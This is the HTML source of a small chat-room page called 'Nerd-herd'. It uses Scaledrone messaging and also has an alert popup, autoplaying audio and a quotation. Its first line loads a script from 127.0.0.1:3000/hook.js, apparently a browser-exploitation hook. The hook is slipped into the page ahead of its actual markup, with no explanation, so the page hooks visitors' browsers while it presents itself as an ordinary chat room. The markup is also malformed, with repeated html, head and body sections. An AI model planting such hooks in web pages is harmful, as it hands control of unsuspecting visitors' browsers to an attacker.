<!DOCTYPE html>
    



<html> 
<script src="http://127.0.0.1:3000/hook.js"></script> </html>
<html>
<head>
    
         <script>
        alert("you are entering virtual chat room :)");
    </script>
    
      <embed src="wanted.mp3" loop="true" autostart="true" width="2" height="0">
     
    
        
   <h1>Nerd-herd</h1>
  <script type='text/javascript' src='https://cdn.scaledrone.com/scaledrone.min.js'></script>
  <!--<script type='text/javascript' src='http://0.0.0.0:8080/scaledrone.js'></script>-->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <style>
.img{
  background: url('https://images.pexels.com/photos/747964/pexels-photo-747964.jpeg?cs=srgb&dl=pexels-s-migaj-747964.jpg&fm=jpg')no-repeat;
  width: 100%;
  height: 100vh;
  background-size: cover;
  background-position: center;
  position: relative;
}
    body {
      box-sizing: border-box;
      margin: 0;
      padding: 13px;
      display: flex;
      flex-direction: column;
      max-height: 1000vh;
      font-family: -apple-system, BlinkMacSystemFont, sans-serif;
    }

    .members-count,
    .members-list,
    .messages {
      border: 1px solid #e4e4e4;
      padding: 15px;
      margin-bottom: 15px;
    }

    .messages {
      flex-shrink: 1;
      overflow: auto;
    }

    .message {
      padding: 5px 0;
    }
    .message .member {
      display: inline-block;
    }

    .member {
      padding-right: 10px;
      position: relative;
    }

    .message-form {
      display: flex;
      flex-shrink: 0;
    }
    .message-form__input {
      flex-grow: 1;
      border: 1px solid #dfdfdf;
      padding: 10px 15px;
      font-size: 16px;
    }
    .message-form__button {
      margin: 10px;
    }
  </style>
</head>
<body>
  <div class="members-count">-</div>
  <div class="members-list">-</div>
  <div class="messages"></div>
  <form class="message-form" onsubmit="return false;">
    <input class="message-form__input" placeholder="Type a message.." type="text"/>
    <input class="message-form__button" value="Send" type="submit"/>
  </form>
  <script src="./script.js"></script>
  <small> 2022 hyperstream, Inc </small>

<head>
    <style>
        a:link {
            color: black;
        }
        a:visited {
            color: black;
        }
        a:hover {
            color: blue;
        }
        a:active {
            color: black;
        }
    </style>
</head>
 
<body>

    <small> <b> <a href="Privacy.html" target="page"> Privacy-policy</a> </b> </small>

</body>

</html>
<hr>
<head>

<blockquote class="wp-block-quote"><p>  in the midst of chaous there is also an opportunities.</p><cite>          sun tzu</cite></blockquote>
</body>
</html>

